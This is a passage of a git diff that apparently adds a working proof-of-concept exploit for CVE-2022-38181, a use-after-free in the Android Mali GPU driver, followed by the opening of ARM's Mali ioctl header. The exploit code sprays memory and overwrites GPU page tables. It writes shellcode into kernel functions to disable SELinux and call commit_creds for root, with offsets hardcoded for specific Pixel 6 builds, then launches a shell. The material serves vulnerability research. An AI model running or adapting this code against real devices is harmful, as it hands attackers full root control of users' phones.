i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t alias_sprayed_regions(int mali_fd) { + union kbase_ioctl_mem_alias alias = {0}; + alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + alias.in.stride = SPRAY_PAGES; + + alias.in.nents = SPRAY_NUM; + struct base_mem_aliasing_info ai[SPRAY_NUM]; + for (int i = 0; i < SPRAY_NUM; i++) { + ai[i].handle.basep.handle = gpu_va[i]; + ai[i].length = SPRAY_PAGES; + ai[i].offset = 0; + } + alias.in.aliasing_info = (uint64_t)(&(ai[0])); + mem_alias(mali_fd, &alias); + uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap alias failed"); + } + alias_regions[0] = region; + for (int i = 1; i < SPRAY_NUM; i++) { + void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES); + if (this_region == MAP_FAILED) { + err(1, "mmap alias failed %d\n", i); + } + alias_regions[i] = this_region; + } + return (uint64_t)region; +} + +void fault_pages() { + int read = 0; + for (int va = 0; va < SPRAY_NUM; va++) { + uint8_t* this_va = (uint8_t*)(gpu_va[va]); + *this_va = 0; + uint8_t* this_alias = alias_regions[va]; + read += 
*this_alias; + } + LOG("read %d\n", read); +} + +int find_freed_idx(int mali_fd) { + int freed_idx = -1; + for (int j = 0; j < SPRAY_NUM; j++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = gpu_va[j]; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query); + if (query.out.value != SPRAY_PAGES) { + LOG("jit_free commit: %d %llu\n", j, query.out.value); + freed_idx = j; + } + } + return freed_idx; +} + +int find_pgd(int freed_idx, int start_pg) { + uint64_t* this_alias = alias_regions[freed_idx]; + for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = this_alias[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + return pg; + } + } + } + return -1; +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = 
reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) { + avc_deny = AVC_DENY_2108; + sel_read_enforce = SEL_READ_ENFORCE_2108; + fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) { + avc_deny = AVC_DENY_2201; + sel_read_enforce = SEL_READ_ENFORCE_2201; + fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) { + avc_deny = AVC_DENY_2202; + sel_read_enforce = SEL_READ_ENFORCE_2202; + fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) { + avc_deny = AVC_DENY_2207; + sel_read_enforce = SEL_READ_ENFORCE_2207; + fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207); + return; + } + + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void spray(int mali_fd) { + 
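+  /*
+   * Heap spray: two batches of 32 allocations reserve SPRAY_PAGES-page
+   * regions with commit_pages = 0 and map them into the CPU address space.
+   * No physical pages are committed yet; trigger() calls mem_commit() on
+   * every region right after it detects that the JIT region has been
+   * evicted, so the spray regions can pick up the freed backing pages.
+   */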
uint64_t cookies[32] = {0}; + for (int j = 0; j < 32; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j] = alloc.out.gpu_va; + } + for (int j = 0; j < 32; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } + for (int j = 32; j < 64; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j - 32] = alloc.out.gpu_va; + } + for (int j = 32; j < 64; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } +} + +int trigger(int mali_fd, int mali_fd2, int* flush_idx) { + if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) { + err(1, "Out of memory."); + } + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + + uint64_t jit_pages = SPRAY_PAGES; + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr); + atom_number++; + mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); + for (int i = 0; i < NUM_TRIALS; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + migrate_to_cpu(SPRAY_CPU); + spray(mali_fd); + for (int j = 0; j < SPRAY_NUM; j++) { + mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES); + } + LOG("region freed %d\n", i); + + uint64_t alias_region = alias_sprayed_regions(mali_fd); + fault_pages(); + LOG("cleanup flush region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + jit_free(mali_fd, atom_number, jit_id); + + map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + LOG("jit_freed\n"); + int freed_idx = find_freed_idx(mali_fd); + if (freed_idx == -1) err(1, "Failed to find freed_idx"); + LOG("Found freed_idx %d\n", freed_idx); + int pgd_idx = find_pgd(freed_idx, 0); + if (pgd_idx == -1) err(1, "Failed to find pgd"); + uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000); + LOG("Found pgd %d, %lx\n", pgd_idx, pgd); + atom_number++; + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd); + return 0; + } + } + LOG("failed, retry.\n"); + jit_id++; + *flush_idx += NUM_TRIALS; + return -1; +} + +#ifdef SHELL + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, 
mali_fd2, &flush_idx)) { + system("sh"); + break; + } + } +} +#else +#include +JNIEXPORT int JNICALL +Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz) +{ + setbuf(stdout, NULL); + setbuf(stderr, NULL); + sleep(10); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, mali_fd2, &flush_idx)) { + LOG("uid: %d euid %d", getuid(), geteuid()); + return 0; + } + } + return -1; +} +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h new file mode 100644 index 0000000..3b61e20 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h @@ -0,0 +1,1060 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_JM_IOCTL_H_ +#define _UAPI_KBASE_JM_IOCTL_H_ + +#include +#include + +/* + * 11.1: + * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags + * 11.2: + * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED, + * which some user-side clients prior to 11.2 might fault if they received + * them + * 11.3: + * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and + * KBASE_IOCTL_STICKY_RESOURCE_UNMAP + * 11.4: + * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET + * 11.5: + * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD) + * 11.6: + * - Added flags field to base_jit_alloc_info structure, which can be used to + * specify pseudo chunked tiler alignment for JIT allocations. + * 11.7: + * - Removed UMP support + * 11.8: + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags + * 11.9: + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY + * under base_mem_alloc_flags + * 11.10: + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations + * with one softjob. + * 11.11: + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags + * 11.12: + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS + * 11.13: + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT + * 11.14: + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set + * under base_mem_alloc_flags + * 11.15: + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags. 
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be + * passed to mmap(). + * 11.16: + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf. + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer + * requiring external resource or sticky resource tracking. UNLESS, + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled. + * 11.17: + * - Added BASE_JD_REQ_JOB_SLOT. + * - Reused padding field in base_jd_atom_v2 to pass job slot number. + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO + * 11.18: + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags + * 11.19: + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified. + * 11.20: + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2 + * (replacing '_OLD') and _11_5 suffixes + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in + * base_jd_atom_v2. It must currently be initialized to zero. + * - Added heap_info_gpu_addr to base_jit_alloc_info, and + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's + * flags member. Previous variants of this structure are kept and given _10_2 + * and _11_5 suffixes. + * - The above changes are checked for safe values in usual builds + * 11.21: + * - v2.0 of mali_trace debugfs file, which now versions the file separately + * 11.22: + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2. + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel. + * 11.23: + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify + * the physical memory backing of JIT allocations. This was not supposed + * to be a valid use case, but it was allowed by the previous implementation. + * 11.24: + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory + * 'scheduling'. + * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. 
+ */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + _IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. 
See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. 
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. 
